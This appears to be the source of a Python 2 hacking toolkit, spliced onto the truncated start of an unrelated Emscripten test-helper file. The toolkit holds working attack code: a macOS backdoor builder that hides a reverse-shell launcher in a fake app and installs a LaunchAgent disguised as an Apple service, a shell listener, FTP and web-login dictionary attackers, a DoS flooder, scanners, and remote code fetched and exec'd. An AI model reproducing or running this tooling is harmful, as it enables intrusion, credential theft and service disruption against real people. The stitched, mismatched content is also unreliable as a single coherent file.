chmod +x ~/Library/.h/connect.sh
echo '<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apples.services</string>
<key>ProgramArguments</key>
<array>
<string>/bin/sh</string>
<string>'$HOME'/Library/.h/connect.sh</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>StartInterval</key>
<integer>60</integer>
<key>AbandonProcessGroup</key>
<true/>
</dict>
</plist>' > ~/Library/LaunchAgents/com.apples.services.plist
chmod 600 ~/Library/LaunchAgents/com.apples.services.plist
launchctl load ~/Library/LaunchAgents/com.apples.services.plist
exit
'''
def create(self, IP, port, OS, appname='funny_cats'):
'''Creates a user-level reverse shell.'''
if OS == 'OSX':
self.osx_payload = self.osx_payload.replace('HOST', IP).replace('PORT', str(port))
try:
os.makedirs(os.getcwd() + '/' + appname + '.app/Contents/MacOS')
except:
pass
payload_path = os.getcwd() + '/' + appname + '.app/Contents/MacOS/' + appname
with open(payload_path, 'w') as f:
f.write(self.osx_payload)
import subprocess
subprocess.Popen(['chmod', '755', payload_path])
print 'Payload saved to ' + os.getcwd() + '/' + appname + '.app'
class Server(object):
def __init__(self, port):
import socket
self.port = port
self.address = ('', port)
def listen(self):
import time
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(self.address)
sock.listen(1)
while True:
connection, cAddress = sock.accept()
try:
print 'New connection', cAddress
while True:
data = connection.recv(32768)
if data:
print '\n'.join(data.split('\n')[:-1])
response = raw_input('bash$ ')
data = None
if response:
connection.sendall(response + '\n')
time.sleep(0.5)
finally:
connection.close()
class FTPAuth(object):
'''FTP login and command handler.
Commands:
login() Args: username, password
send() Args: message
'''
def __init__(self, IP, port=21):
self.IP = IP
self.port = port
self.username = ''
self.password = ''
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.settimeout(5)
self.s.connect((self.IP, self.port))
self.s.recv(1024)
def _send(self, message):
self.s.send(message)
response = self.s.recv(32768)
return response
def send(self, message):
self.s.send(message + '\r\n')
while True:
response = self.s.recv(32768)
if response:
return response
def login(self, username, password):
self._send('USER ' + username + '\r\n')
response = self._send('PASS ' + password + '\r\n')
if '230' in response:
return
elif '331' in response:
return 'Password required'
else:
raise Exception(response)
class AuthClient(object):
'''Universal login tool for most login pages as well as HTTP Basic Authentication.
Commands:
login() Args: url, username, password
'''
def __init__(self):
self.url = ''
self.username = ''
self.password = ''
def _get_login_type(self):
try:
# Attempts to urlopen target URL without exception
data = urllib2.urlopen(self.url)
return 'FORM'
except Exception, e:
if 'error 401' in str(e).lower():
return 'BA'
if 'timed out' in str(e).lower():
return 'TO'
def _login_mechanize(self):
try:
import mechanize
except:
raise MissingPackageException('Please install the mechanize module before continuing.')
# Sets up common input names/ids and creates instance of mechanize.Browser()
userfields = ['user', 'username', 'usr', 'email', 'name', 'login', 'userid', 'userid-input', 'player']
passfields = ['pass', 'password', 'passwd', 'pw', 'pwd']
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(False)
br.addheaders = [('User-agent', 'googlebot')]
# Opens URL and lists controls
response = br.open(self.url)
loginurl = response.geturl()
br.form = list(br.forms())[0]
username_control = ''
password_control = ''
# Locates username and password input, and submits login info
for control in br.form.controls:
if control.name and control.name.lower() in userfields or control.id and control.id.lower() in userfields:
username_control = control
if control.name and control.name.lower() in passfields or control.id and control.id.lower() in passfields:
password_control = control
username_control.value = self.username
try:
password_control.value = self.password
except:
# Detected a username input but not a password input.
# Submits form with username and attempts to detect password input in resulting page
response = br.submit()
br.form = list(br.forms())[0]
for control in br.form.controls:
if control.name and control.name.lower() in passfields or control.id and control.id.lower() in passfields:
password_control = control
password_control.value = self.password
response = br.submit()
# Returns response if the URL is changed. Assumes login failure if URL is the same
if response.geturl() != loginurl:
return response.read()
else:
raise Exception('Login credentials incorrect.')
def _login_BA(self):
try:
# Creates a PasswordMgr instance
passmanager = urllib2.HTTPPasswordMgrWithDefaultRealm()
passmanager.add_password(None, self.url, self.username, self.password)
# Creates an auth handling object and builds it with opener
auth = urllib2.HTTPBasicAuthHandler(passmanager)
opener = urllib2.build_opener(auth)
response = opener.open(self.url, timeout=8)
data = response.read()
response.close()
return data
except Exception, e:
if 'Error 401' in str(e):
raise Exception('Login credentials incorrect.')
def login(self, url, username, password):
self.url = url
self.username = username
self.password = password
# ascertain the type of login page given by url
logintype = self. _get_login_type()
if logintype == 'BA':
# attempts to login with BA method and return html
return self._login_BA()
if logintype == 'TO':
raise Exception('Request timed out.')
if logintype == 'FORM':
return self._login_mechanize()
class DOSer(object):
'''Hits a host with GET requests on default port 80 from multiple threads.
Commands:
launch() Args: host, duration, threads(default 1), port(default 80),
payload(default crocodile)
'''
def __init__(self):
self.target = '127.0.0.1'
self.port = 80
self.threads = 1
self.payload = '?INTERIORCROCODILEALLIGATORIDRIVEACHEVROLETMOVIETHEATER'
self.start_time = 0
self.time_length = 1
def _attack(self, target):
# Sends GET requests for time_length duration
while int(time.time()) < self.start_time + self.time_length:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
try:
s.connect((self.target, self.port))
s.send("GET /" + self.payload + " HTTP/1.1\r\n")
s.send("Host: " + self.target + "\r\n\r\n")
except:
pass
def _threader(self):
while True:
self.worker = self.q.get()
self._attack(self.worker)
self.q.task_done()
def launch(self, host, duration, threads=1, port=80, payload='default'):
'''Launches threaded GET requests for (duration) seconds.
'''
self.target = host
self.port = port
self.threads = threads
self.start_time = int(time.time())
self.time_length = duration
if payload != 'default':
self.payload = payload
# Creates queue to hold each thread
self.q = Queue.Queue()
#print '> Launching ' + str(threads) + ' threads for ' + str(duration) + ' seconds.'
for i in range(threads):
t = threading.Thread(target=self._threader)
t.daemon = True
t.start()
# Adds workers to queue
for worker in range(0, threads):
self.q.put(worker)
self.q.join()
return
class PortScanner(object):
'''Scan an IP address using scan(host) with default port range 1-1024.
Commands:
scan() Args: IP, port_range(default 1024), timeout(default 1), verbose(default True)
'''
def __init__(self):
self.IP = '127.0.0.1'
self.port_range = '1025'
self.print_lock = threading.Lock()
self.timeout = 2
self.openlist = []
self.verbose = True
def _portscan(self, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(self.timeout)
# Tries to establish a connection to port, and append to list of open ports
try:
con = s.connect((self.IP, port))
response = s.recv(1024)
self.openlist.append(port)
if self.verbose:
with self.print_lock:
print 'Port', str(port) + ':'
print response
s.close()
# If the connection fails, tries to establish HTTP connection if port is a common HTTP port
except Exception, e:
httplist = [80, 81, 443, 1900, 2082, 2083, 8080, 8443]
if port in httplist:
try:
headers = '''GET /HTTP/1.1
Host: ''' + self.IP + '''
User-Agent: googlebot
Accept: text/html, application/xhtml+xml, application/xml; q=09, */*; q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate''' + '\r\n\r\n'
s.send(headers)
response = s.recv(1024)
response = response.splitlines()
response = '\n'.join(response[:7])
self.openlist.append(port)
if self.verbose:
with self.print_lock:
print 'Port', str(port) + ':'
print response
s.close()
except:
pass
def portOpen(self, port):
if port in self.openlist:
return
else:
return False
def _threader(self):
while True:
self.worker = self.q.get()
self._portscan(self.worker)
self.q.task_done()
def scan(self, IP, port_range=(1, 1025), timeout=1, verbose=True):
'''Scans ports of an IP address. Use getIP() to find IP address of host.
'''
self.openlist = []
self.IP = IP
self.port_range = port_range
self.timeout = 1
# Creates queue to hold each thread
self.q = Queue.Queue()
for x in range(30):
t = threading.Thread(target=self._threader)
t.daemon = True
t.start()
# Adds workers to queue
for worker in range(port_range[0], port_range[1]):
self.q.put(worker)
self.q.join()
class LanScanner(object):
'''Scans local devices on your LAN network.
Commands:
scan() Args: host_range(default (1, 255))
'''
def __init__(self):
self.host_range = []
self.alive_hosts = []
self.localIP = ''
def _threader(self):
while True:
self.worker = self.q.get()
self._scan(self.worker)
self.q.task_done()
def _scan(self, host):
import subprocess
try:
resp = subprocess.check_output(['ping', '-c1', '-W90', host])
self.alive_hosts.append(host)
except:
return
def getLocalIP(self):
import subprocess
proc = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE, shell=True)
(out, err) = proc.communicate()
data = out.splitlines()
for line in data:
if 'inet ' in line and '127.' not in line:
return line.split(' ')[1]
def scan(self, h_range=(1, 255)):
# Finds local IP first in order to determine IP range of local network
localip = self.getLocalIP()
stub = '.'.join(localip.split('.')[:-1])
# Adds list of possible local hosts to self.range_range
for i in range(h_range[0], h_range[1]):
self.host_range.append(stub + '.' + str(i))
self.q = Queue.Queue()
# Launches 100 threads to ping 254 potential hosts
for x in range(100):
t = threading.Thread(target=self._threader)
t.daemon = True
t.start()
for worker in self.host_range:
self.q.put(worker)
self.q.join()
return list(set(self.alive_hosts))
class _Getch:
"""Gets a single character from standard input. Does not echo to the
screen."""
def __init__(self):
try:
self.impl = _GetchWindows()
except ImportError:
try:
self.impl = _GetchUnix()
except ImportError:
self.impl = _GetchMacCarbon()
def __call__(self): return self.impl()
class _GetchUnix:
def __init__(self):
import tty
import sys
import termios
def __call__(self):
import sys
import tty
import termios
try:
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
except:
return raw_input('> ')
class _GetchWindows:
def __init__(self):
import msvcrt
def __call__(self):
try:
import msvcrt
return msvcrt.getch()
except:
return raw_input('> ')
class Proxy(object):
'''Can work in conjunction with getProxies() to tunnel all
network activity in the Python script through a Socks4/5 proxy.
Commands:
connect() Args: getProxies(), timeout=10
connect_manual() Args: IP, port, proxy_type
'''
def __init__(self):
self.IP = ''
self.port = ''
self.proxy_type = ''
self.country = ''
self._socksfile = urllib2.urlopen('https://raw.githubusercontent.com/Anorov/PySocks/master/socks.py').read()
global socks
# Dynamically import socks.py from the internet
socks = importFromString(self._socksfile, 'socks')
def connect(self, proxies, timeout=10):
for proxy in proxies:
if proxy[4] == 'Socks4':
self.proxy_type = socks.PROXY_TYPE_SOCKS4
else:
self.proxy_type = socks.PROXY_TYPE_SOCKS5
try:
# Sets the socket.socket class to the socks module's socksocket class
socks.setdefaultproxy(self.proxy_type, proxy[0], int(proxy[1]))
socket.socket = socks.socksocket
# Tests to see if the proxy can open a webpage
currentIP = urllib2.urlopen('http://icanhazip.com/', timeout=timeout).read().split()[0]
self.IP = proxy[0]
self.port = int(proxy[1])
self.country = proxy[2]
return
except:
pass
raise Exception('Couldn\'t connect to any proxies.')
def connect_manual(IP, port, proxy_type='Socks5'):
if proxy_type == 'Socks4':
self.proxy_type = socks.PROXY_TYPE_SOCKS4
else:
self.proxy_type = socks.PROXY_TYPE_SOCKS5
try:
socks.setdefaultproxy(self.proxy_type, IP, port)
socket.socket = socks.socksocket
currentIP = urllib2.urlopen('http://icanhazip.com/').read().split()[0]
self.IP = IP
self.port = port
return currentIP
except:
raise Exception('Connection failed.')
def importFromString(code, name):
"""Import dynamically generated code as a module.
Args: code: a string, a file handle, or a compiled binary
name: the name of the module
"""
import sys
import imp
module = imp.new_module(name)
exec code in module.__dict__
return module
def getIP(host):
return socket.gethostbyname(host)
def randomIP():
import struct
return socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))
def getProxies(country_filter='ALL', proxy_type=('Socks4', 'Socks5')):
'''Gets list of recently tested Socks4/5 proxies.
Return format is as follows:
[IP, Port, Country Code, Country, Proxy Type, Anonymous, Yes/No, Last Checked]
Args: country_filter: Specify country codes within a tuple, e.g. ('US', 'MX')
proxy_type: Specify whic Socks version to use, e.g. 'Socks5'
'''
try:
import mechanize
except:
raise MissingPackageException('Please install the mechanize module before continuing. Use hacklib.installDependencies()')
try:
from bs4 import BeautifulSoup
except:
raise MissingPackageException('Please install the beautifulsoup4 module before continuing. Use hacklib.installDependencies()')
br = mechanize.Browser()
br.set_handle_robots(False)
br.addheaders = [('User-agent', 'googlebot')]
data = br.open('http://www.socks-proxy.net').read()
soup = BeautifulSoup(data, 'html.parser')
proxylist = []
table = soup.find('table')
tbody = table.find('tbody')
rows = tbody.find_all('tr')
for row in rows:
cols = row.find_all('td')
cols = [ele.text.strip() for ele in cols]
proxylist.append([ele for ele in cols if ele])
filteredlist = []
if not country_filter == 'ALL':
for proxy in proxylist:
if proxy[2] in country_filter:
filteredlist.append(proxy)
proxylist = filteredlist
filteredlist = []
if not proxy_type == ('Socks4', 'Socks5'):
for proxy in proxylist:
if not country_filter == 'ALL':
if proxy[4] in proxy_type and proxy[2] in country_filter:
filteredlist.append(proxy)
else:
if proxy[4] in proxy_type:
filteredlist.append(proxy)
proxylist = filteredlist
return proxylist
def installDependencies():
import subprocess
mech = subprocess.check_output(['/usr/local/bin/pip', 'install', 'mechanize'])
if 'successfully installed' in mech:
print 'Installed mechanize'
beaut = subprocess.check_output(['/usr/local/bin/pip', 'install', 'bs4'])
if 'successfully installed' in beaut:
print 'Installed beautifulsoup'
scapy = subprocess.check_output(['/usr/local/bin/pip', 'install', 'scapy'])
if 'successfully installed' in scapy:
print 'Installed scapy'
pcapy = subprocess.check_output(['/usr/local/bin/pip', 'install', 'pcapy'])
if 'successfully installed' in pcapy:
print 'Installed pcapy'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def send(IP, port, message, keepalive=False):
'''Creates new socket and sends a TCP message. If keepalive is true, use hacklib.sock
to handle socket and hacklib.sock.close() when finished.
'''
if keepalive:
global sock
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((IP, port))
sock.send(message)
response = sock.recv(2048)
if not keepalive:
sock.close()
return response
def ping(host):
"""Pings a host and returns true if the host exists.
"""
import os
import platform
ping_str = "-n 1" if platform.system().lower() == "windows" else "-c 1"
return os.system("ping " + ping_str + " " + host) == 0
def topPasswords(amount):
'''Get up to 100,000 most common passwords.
'''
url = 'https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/10_million_password_list_top_100000.txt'
passlist = urllib2.urlopen(url).read().split('\n')
return passlist[:amount]
def uiPortScan(address):
print ''
print '1) default scan (port range 1-1024)'
print '2) custom range'
ink = _Getch()
cmd = ink()
ps = PortScanner()
print 'Beginning port scan.'
if cmd == '1':
ps.scan(address)
if cmd == '2':
s_port = raw_input('Input starting port > ')
e_port = raw_input('Input end port >')
ps.scan(address, (int(s_port), int(e_port)))
print 'Port scan complete.'
def uiDOS(address):
dos = DOSer()
print ''
duration = raw_input('Duration > ')
threads = raw_input('Threads > ')
port = int(raw_input('Port > '))
payload = raw_input('Payload > ')
print 'Launching DOS attack'
dos.launch(address, duration, threads, port, payload)
def uiTCPMessage(address):
print ''
port = int(raw_input('Input port >'))
message = raw_input('Message > ')
send(address, port, message)
def uiLogin(address):
print ''
print 'Select login type'
print '1) HTTP/Form login'
print '2) FTP login'
print '3) Exit'
print ''
ink = _Getch()
cmd = ink()
if cmd == '1':
ac = AuthClient()
print '1) Dictionary attack'
print '2) Exit'
ink = _Getch()
cmd = ink()
if cmd == '1':
username = raw_input('Username > ')
print '1) Try most common passwords'
print '2) Import password list (separated by newline)'
cmd = ink()
if cmd == '1':
print 'Try the top <input number> out of 100,000 most common passwords:'
num = int(raw_input('> '))
passwords = topPasswords(num)
if cmd == '2':
passfile = raw_input('Filepath > ')
with open(passfile, 'r') as f:
passwords = passfile.read().splitlines()
print 'Input a unique string the webpage may respond with if login fails'
print 'i.e. "please try again" or "login failed"'
failstring = raw_input('> ')
for password in passwords:
try:
data = ac.login(address, username, password)
if failstring in data:
print password + ' failed'
elif failstring not in data:
print 'Login success!'
print 'Password is: ' + password
time.sleep(2)
return
except:
print password + ' failed'
if cmd == '2':
return
if cmd == '2':
ftp = FTPAuth(address)
print '1) Dictionary attack'
print '2) Single login'
print '3) Exit'
ink = _Getch()
cmd = ink()
username = raw_input('Username > ')
if cmd == '1':
print 'Try the top <input number> out of 100,000 most common passwords:'
num = raw_input('> ')
for password in topPasswords(num):
try:
response = ftp.send('USER ' + username + '\r\n')
if '331' in response:
response = ftp.send('PASS ' + password + '\r\n')
if '331' in response:
response = ftp.send('PASS ' + password + '\r\n')
if '230' in response:
print 'Login success!'
print 'Password is: ' + password
time.sleep(2)
return
if '530' in response:
print password + ' failed.'
ftp = FTPAuth(address)
except:
print password + ' failed.'
ftp = FTPAuth(address)
if cmd == '2':
username = raw_input('Username > ')
ftp.send('USER ' + username + '\r\n')
password = raw_input('Password > ')
ftp.send('PASS ' + password + '\r\n')
if cmd == '3':
return
def uiLanScan():
lan = LanScanner()
print 'Starting Lan scan'
hosts = lan.scan()
for ip in hosts:
print ip
print 'Lan scan complete.'
time.sleep(2)
def uiCreateBackdoor():
print ''
print 'Select OS'
print '1) Mac OSX'
ink = _Getch()
cmd = ink()
if cmd == '1':
ip = raw_input('Listener IP > ')
port = raw_input('Listener Port > ')
appname = raw_input('Filename > ')
bd = Backdoor()
bd.create(ip, port, 'OSX', appname)
time.sleep(2)
def uiServer():
print ''
port = raw_input('Listening port > ')
s = Server(int(port))
print 'Listening on port ' + port
s.listen()
def userInterface():
'''Start UI if hacklib isn't being used as a library.
'''
firstrun = 0
while True:
if firstrun == 0:
print '----------------------------------------------'
print 'Hey. What can I do you for?'
print '\n'
firstrun += 1
print 'Enter the number corresponding to your choice.'
print ''
print '1) Connect to a proxy'
print '2) Target an IP or URL'
print '3) Lan Scan'
print '4) Create Backdoor'
print '5) Server'
print '6) Exit'
ink = _Getch()
cmd = ink()
if cmd == '6':
return
if cmd == '2':
address = raw_input('Input IP or URL > ')
if '.' not in address:
print 'Invalid IP/URL.'
return
print 'What would you like to do?'
print ''
print '1) Port scan'
print '2) DOS'
print '3) Send TCP message'
print '4) Attempt login'
print '5) Exit'
cmd = ink()
if cmd == '1':
uiPortScan(getIP(address))
if cmd == '2':
uiDOS(getIP(address))
if cmd == '3':
uiTCPMessage(getIP(address))
if cmd == '4':
uiLogin(address)
cmd = ''
if cmd == '3':
uiLanScan()
if cmd == '4':
uiCreateBackdoor()
if cmd == '5':
uiServer()
if cmd == '1':
print 'Would you like to automatically find a proxy or input one manually?'
print 'Enter the number corresponding to your choice.'
print ''
print '1) Auto'
print '2) Manual'
cmd = ink()
print 'Connecting to a SOCKS proxy.'
proxies = getProxies()
global proxy
proxy = Proxy()
if cmd == '1':
proxy.connect(getProxies())
print 'Your new IP address is ' + proxy.IP
print 'This proxy is located in ' + proxy.country
print '---------'
time.sleep(2)
if cmd == '2':
pr_address = raw_input('Proxy address > ')
pr_port = raw_input('Proxy port > ')
pr_type = raw_input('Enter "Socks4" or "Socks5" > ')
try:
proxy.connect_manual(pr_address, pr_port, pr_type)
except:
print 'Connection failed.'
time.sleep(2)
pass
print 'Proxy connected.'
time.sleep(2)
pass
"""
This Class Mangles Words specified by the user
Example:
Test = hacklib.Mangle("Test", 1, 10, 1996, 2016)
Test.Leet()
Output: T3st
"""
class Mangle:
def __init__(self, text, num1, num2, year1, year2):
self.num1 = num1
self.num2 = num2
self.year1 = year1
self.year2 = year2
self.text = text
def Numbers(self):
for x in self.text.split():
for i in range(self.num1, self.num2):
print ("%s" + "%s") % (x, i)
print ("%s" + "%s") % (i, x)
def Years(self):
for x in self.text.split():
for i in range(self.year1, self.year2):
print ("%s" + "%s") % (x, i)
print ("%s" + "%s") % (i, x)
def UniqueNum(self):
for x in self.text.split():
for i in range(self.num1, self.num2):
print ("%s" + "%s" + "%s") % (x, x, i)
def UniqueYears(self):
for x in self.text.split():
for i in range(self.year1, self.year2):
print ("%s" + "%s" + "%s") % (x, x, i)
def FirstLetterCapNum(self):
for x in self.text.split():
for i in range(self.num1, self.num2):
print ("%s" + "%s") % (x.capitalize(), i)
print ("%s" + "%s") % (i, x.capitalize())
def Caps(self):
for x in self.text.split():
print x.capitalize()
def UniqueCaps(self):
for x in self.text.split():
print ("%s" + "s") % (x.capitalize(), x.capitalize())
def CapandYears(self):
for x in self.text.split():
for i in range(self.year1, self.year2):
print ("%s" + "%s") % (x.capitalize(), i)
print ("%s" + "%s") % (i, x.capitalize())
def Leet(self):
for x in self.text.split():
print x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8")
def LeetCap(self):
for x in self.text.split():
print x.capitalize().replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8")
def LeetYears(self):
for x in self.text.split():
for i in range(self.year1, self.year2):
print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"), i)
print ("%s" + "%s") % (i, x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"))
def LeetNumbers(self):
for x in self.text.split():
for i in range(self.num1, self.num2):
print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"), i)
print ("%s" + "%s") % (i, x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"))
def UniqueLeet(self):
for x in self.text.split():
print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"), (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8")))
def Reverse(self):
for x in self.text.split():
print x[::-1]
def ReverseCap(self):
for x in self.text.split():
print x[::-1].capitalize()
def ReverseNum(self):
for x in self.text.split():
for i in range(self.num1, self.num2):
print ("%s" + "%s") % (x[::-1], i)
print ("%s" + "%s") % (i, x[::-1])
def ReverseYears(self):
for x in self.text.split():
for i in range(self.year1, self.year2):
print ("%s" + "%s") % (x[::-1], i)
print ("%s" + "%s") % (i, x[::-1])
def ReverseUnique(self):
for x in self.text.split():
print x[::-1] + x[::-1]
'''
This Classes Dectects Probe Requests from Wireless Devices.
Example:
Probe = Proberequests("wlan0")
Probe.startSniff()
'''
class Proberequests:
global probeReqs
probeReqs = []
def __init__(self, interface):
self.interface = interface
def sniffProbe(self, p):
if p.haslayer(Dot11ProbeReq):
netName = p.getlayer(Dot11ProbeReq).info
if netName not in probeReqs:
probeReqs.append(netName)
print '[!] Detected New Probe Request: '
print "[+] ESSID: " + netName + " BSSID: " + p.addr2
def startSniff(self):
print "[+] Scanning...\n"
sniff(iface=self.interface, prn=self.sniffProbe)
"""
This class creates a unique pattern of 20280 characters.
This is a replica of the metasploit tool called pattern_create.rb
Example:
patternTest = PatternCreate(1000)
patternTest.generate()
Creates a unique pattern of 1000 characters.
"""
class PatternCreate:
global MAX_PATTERN_LENGTH
MAX_PATTERN_LENGTH = 20280
def __init__(self, length):
self.length = length
def generate(self):
output = []
"""
Generate a pattern of a given length up to a maximum
of 20280 - after this the pattern would repeat
"""
if self.length >= MAX_PATTERN_LENGTH:
raise MaxLengthException('ERROR: Pattern length exceeds maximum of %d' % MAX_PATTERN_LENGTH)
pattern = ''
for upper in ascii_uppercase:
for lower in ascii_lowercase:
for digit in digits:
if len(pattern) < self.length:
pattern += upper+lower+digit
else:
out = pattern[:self.length]
output.append(out)
print str(output)[1:-1].replace("'", "")
"""
This class finds the offset from the PatternCreate class.
This is a replica of the metasploit tool called pattern_offset.rb
Example:
offset = PatternOffset("Aw1A")
offset.find()
Finds offset of Aw1A.
Output: [+] Offset: 663
"""
class PatternOffset:
def __init__(self, search_pattern):
self.search_pattern = search_pattern
def find(self):
offset = []
needle = self.search_pattern
try:
if needle.startswith('0x'):
# Strip off '0x', convert to ASCII and reverse
needle = needle[2:]
needle = bytes.fromhex(needle).decode('ascii')
needle = needle[::-1]
except TypeError as e:
print('Unable to convert hex input:', e)
sys.exit(1)
haystack = ''
for upper in ascii_uppercase:
for lower in ascii_lowercase:
for digit in digits:
haystack += upper+lower+digit
found_at = haystack.find(needle)
if found_at > -1:
offset = found_at
print "[+] Offset: " + str(offset)
if __name__ == '__main__':
userInterface()
class MissingPackageException(Exception):
'''Raise when 3rd party modules are not able to be imported.'''
class MissingPipexception(Exception):
'''Raise when pip is not able to be found'''
|
common.py
|
# Copyright 2021 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
from enum import Enum
from functools import wraps
from pathlib import Path
from subprocess import PIPE, STDOUT
from urllib.parse import unquote, unquote_plus
from http.server import HTTPServer, SimpleHTTPRequestHandler
import contextlib
import difflib
import hashlib
import logging
import multiprocessing
import os
import re
import shlex
import shutil
import stat
import string
import subprocess
import sys
import tempfile
import time
import webbrowser
import unittest
import clang_native
import jsrun
from tools.shared import TEMP_DIR, EMCC, EMXX, DEBUG, EMCONFIGURE, EMCMAKE
from tools.shared import EMSCRIPTEN_TEMP_DIR
from tools.shared import EM_BUILD_VERBOSE
from tools.shared import get_canonical_temp_dir, try_delete, path_from_root
from tools.utils import MACOS, WINDOWS, read_file, read_binary, write_file, write_binary
from tools import shared, line_endings, building, config
logger = logging.getLogger('common')
# User can specify an environment variable EMTEST_BROWSER to force the browser
# test suite to run using another browser command line than the default system
# browser.
# There are two special value that can be used here if running in an actual
# browser is not desired:
# EMTEST_BROWSER=0 : This will disable the actual running of the test and simply
# verify that it compiles and links.
# EMTEST_BROWSER=node : This will attempt to run the browser test under node.
# For most browser tests this does not work, but it can
# be useful for running pthread tests under node.
EMTEST_BROWSER = None
EMTEST_DETECT_TEMPFILE_LEAKS = None
EMTEST_SAVE_DIR = None
# generally js engines are equivalent, testing 1 is enough. set this
# to force testing on all js engines, good to find js engine bugs
EMTEST_ALL_ENGINES = None
EMTEST_SKIP_SLOW = None
EMTEST_LACKS_NATIVE_CLANG = None
EMTEST_VERBOSE = None
EMTEST_REBASELINE = None
EMTEST_FORCE64 = None
# Special value for passing to assert_returncode which means we expect that program
# to fail with non-zero return code, but we don't care about specifically which one.
NON_ZERO = -1
TEST_ROOT = path_from_root('tests')
WEBIDL_BINDER = shared.bat_suffix(path_from_root('tools/webidl_binder'))
EMBUILDER = shared.bat_suffix(path_from_root('embuilder'))
EMMAKE = shared.bat_suffix(path_from_root('emmake'))
WASM_DIS = Path(building.get_binaryen_bin(), 'wasm-dis')
def delete_contents(pathname):
for entry in os.listdir(pathname):
try_delete(os.path.join(pathname, entry))
# TODO(sbc): Should we make try_delete have a stronger guarantee?
assert not os.path.exists(os.path.join(pathname, entry))
def test_file(*path_components):
"""Construct a path relative to the emscripten "tests" directory."""
return str(Path(TEST_ROOT, *path_components))
# checks if browser testing is enabled
def has_browser():
return EMTEST_BROWSER != '0'
def compiler_for(filename, force_c=False):
if shared.suffix(filename) in ('.cc', '.cxx', '.cpp') and not force_c:
return EMXX
else:
return EMCC
# Generic decorator that calls a function named 'condition' on the test class and
# skips the test if that function returns true
def skip_if(func, condition, explanation='', negate=False):
assert callable(func)
explanation_str = ' : %s' % explanation if explanation else ''
@wraps(func)
def decorated(self, *args, **kwargs):
choice = self.__getattribute__(condition)()
if negate:
choice = not choice
if choice:
self.skipTest(condition + explanation_str)
func(self, *args, **kwargs)
return decorated
def needs_dylink(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
self.check_dylink()
return func(self, *args, **kwargs)
return decorated
def is_slow_test(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
if EMTEST_SKIP_SLOW:
return self.skipTest('skipping slow tests')
return func(self, *args, **kwargs)
return decorated
def disabled(note=''):
assert not callable(note)
return unittest.skip(note)
def no_mac(note=''):
assert not callable(note)
if MACOS:
return unittest.skip(note)
return lambda f: f
def no_windows(note=''):
assert not callable(note)
if WINDOWS:
return unittest.skip(note)
return lambda f: f
def requires_native_clang(func):
assert callable(func)
@wraps(func)
def decorated(self, *args, **kwargs):
if EMTEST_LACKS_NATIVE_CLANG:
return self.skipTest('native clang tests are disabled')
return func(self, *args, **kwargs)
return decorated
def require_node(func):
assert callable(func)
def decorated(self, *args, **kwargs):
self.require_node()
return func(self, *args, **kwargs)
return decorated
def require_v8(func):
assert callable(func)
def decorated(self, *args, **kwargs):
self.require_v8()
return func(self, *args, **kwargs)
return decorated
def node_pthreads(f):
@wraps(f)
def decorated(self, *args, **kwargs):
self.setup_node_pthreads()
f(self, *args, **kwargs)
return decorated
@contextlib.contextmanager
def env_modify(updates):
"""A context manager that updates os.environ."""
# This could also be done with mock.patch.dict() but taking a dependency
# on the mock library is probably not worth the benefit.
old_env = os.environ.copy()
print("env_modify: " + str(updates))
# Seting a value to None means clear the environment variable
clears = [key for key, value in updates.items() if value is None]
updates = {key: value for key, value in updates.items() if value is not None}
os.environ.update(updates)
for key in clears:
if key in os.environ:
del os.environ[key]
try:
yield
finally:
os.environ.clear()
os.environ.update(old_env)
# Decorator version of env_modify
def with_env_modify(updates):
assert not callable(updates)
def decorated(f):
def modified(self, *args, **kwargs):
with env_modify(updates):
return f(self, *args, **kwargs)
return modified
return decorated
def also_with_minimal_runtime(f):
assert callable(f)
def metafunc(self, with_minimal_runtime):
